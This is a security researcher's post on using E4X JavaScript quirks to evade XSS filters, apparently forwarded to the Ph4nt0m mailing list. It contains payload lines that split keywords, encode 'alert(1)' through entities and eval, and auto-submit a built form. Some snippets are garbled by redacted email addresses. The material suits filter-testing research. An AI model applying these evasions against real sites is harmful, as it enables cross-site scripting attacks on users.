If you’ve not been following my sla.ckers thread on unusual javascript <http://sla.ckers.org/forum/read.php?2,15812> then your missing out. My idea was to gather interesting, weird and wonderful javascript tricks which are useful for filter evasion and coding. I investigated E4X quite a lot for this purpose and found a few cool things that I’ll share with you.
Using {} for keyword evasion
Lets say a filter disallows certain words, because the {} allows you to
execute a javascript block; if you execute a block that returns a blank
string then you can use it for keyword evasion. The new array constructor
creates a blank array but when used in concatenation it results in a blank
string.
location=<text>javascr{new Array}ipt:aler{new Array}t(1)</text>
Another example:-
location=<text>javascr{[]}ipt:aler{[]}t(1)</text>
Weird syntax fun
E4X also has some javascript syntax quirks that normally would cause a
parsing error but it’s perfectly valid.
default xml namespace = alert(1)
Some more weird looking stuff:-
<>{eval(/alert(1)/[-1])}</|>>[EMAIL PROTECTED]::xyz
([EMAIL PROTECTED]::abc?alert:[EMAIL PROTECTED]::xyz)(1)
Numbers as E4X
For some reason numbers can be used as XML
[EMAIL PROTECTED]/(are=1)%1..*::xml
Encoding with entities
Giorgio <http://hackademix.net/> brought this to my attention when he was
hacking my unsuccessful Firefox sandbox experiment. You can use html
entities and they will be decoded when using the XML data as strings.
alert(<>"</>)
A more interesting example with decimal entities:-
eval(<>alert(1)</>+[])
Hackvertor supports morphs which allow you to generate this sort of data
automatically, useful for fuzzing XSS filters:-
E4X
<http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEBlNHhf
ZGVjX21vcnBoX2Z1bGxfMz5hbGVydCgxKTxAL2U0eF9kZWNfbW9ycGhfZnVsbF8zPg%3D%3D>
morph
Form creation
Making forms with E4X is lovely, check it out:-
f=<form/>;
[EMAIL PROTECTED]'x';
[EMAIL PROTECTED]'url.php';
[EMAIL PROTECTED]'post';
[EMAIL PROTECTED]'h'
[EMAIL PROTECTED];
document.body.innerHTML=f;
document.getElementById('x').submit();
[Ph4nt0m] <http://www.ph4nt0m.org/>
[Ph4nt0m Security Team]
<http://blog.ph4nt0m.org/> [EMAIL PROTECTED]
Email: [EMAIL PROTECTED]
PingMe:
<http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wu
hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
=== V3ry G00d, V3ry Str0ng ===
=== Ultim4te H4cking ===
=== XPLOITZ ! ===
=== #_# ===
#If you brave,there is nothing you cannot achieve.#
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
<<inline: image001.gif>>
